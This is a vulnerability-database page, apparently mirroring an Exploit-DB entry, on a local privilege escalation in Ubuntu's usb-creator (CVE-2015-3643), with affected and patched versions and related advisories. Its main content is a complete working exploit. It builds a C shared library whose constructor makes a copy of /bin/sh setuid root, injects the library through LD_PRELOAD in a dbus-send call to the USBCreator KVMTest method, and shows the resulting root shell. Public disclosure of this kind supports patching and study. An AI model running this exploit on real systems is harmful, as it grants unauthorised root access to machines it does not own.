Lucene search
+L

usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Local Privilege Escalation

🗓️ 23 Apr 2015 00:00:00Reported by Tavis OrmandyType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 25 Views

USB-creator 0.2.x Ubuntu Local Privilege Escalatio

Related
Code
ReporterTitlePublishedViews
Family
CNVD
usb-creator local authentication bypass vulnerability
14 May 201500:00
cnvd
CVE
CVE-2015-3643
27 Sep 201715:00
cve
Cvelist
CVE-2015-3643
27 Sep 201715:00
cvelist
EUVD
EUVD-2015-3681
7 Oct 202500:30
euvd
NVD
CVE-2015-3643
28 Sep 201701:29
nvd
OSV
UBUNTU-CVE-2015-3643
28 Sep 201701:29
osv
OSV
USN-2576-1 usb-creator vulnerability
23 Apr 201513:08
osv
Prion
Design/Logic Flaw
28 Sep 201701:29
prion
UbuntuCve
CVE-2015-3643
28 Sep 201701:29
ubuntucve
Source: http://www.openwall.com/lists/oss-security/2015/04/22/12
Bug report: https://bugs.launchpad.net/ubuntu/vivid/+source/usb-creator/+bug/1447396

Ubuntu Precise (12.04LTS) <= usb-creator: 0.2.38.3ubuntu    (Patched in: 0.2.38.3ubuntu0.1)
Ubuntu Trusty  (14.04LTS) <= usb-creator 0.2.56.3ubuntu     (Patched in: 0.2.56.3ubuntu0.1)
Ubuntu Utopic  (14.10) <= usb-creator 0.2.62ubuntu0.2         (Patched in: 0.2.62ubuntu0.3)

$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id
euid=0(root) groups=0(root)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Apr 2015 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 24.6
CVSS 37.8
EPSS0.0153
25